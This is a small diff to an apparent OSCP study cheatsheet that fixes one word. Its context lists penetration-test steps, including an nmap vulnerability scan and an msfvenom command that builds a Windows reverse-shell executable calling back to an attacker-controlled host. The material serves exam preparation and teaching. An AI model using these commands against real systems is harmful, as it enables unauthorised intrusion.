airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Full Guide (Enumeration to Priv Escalation).md

 4. Manual ennumeration.
 Visit the open ports to see if we can get initial foothold information. e.g anoymous login, default login,etc\
 5. Check for vulnerabiltieis on specific ports using nmap script `nmap -p 80,445,139 --script=*vuln* $IP`
 ## Check vulnerabilities and enumerate for each port
-0. Go to the differnet MD files in the repo.
+0. Go to the differnet MD files in the repository .

 ## Creating a reverseshell, uploading a revershell  / creating a stageless payload
 0. `msfvenom -p windows/shell_reverse_tcp LHOST=myIP LPORT=1237 -f exe  -o reverse.exe`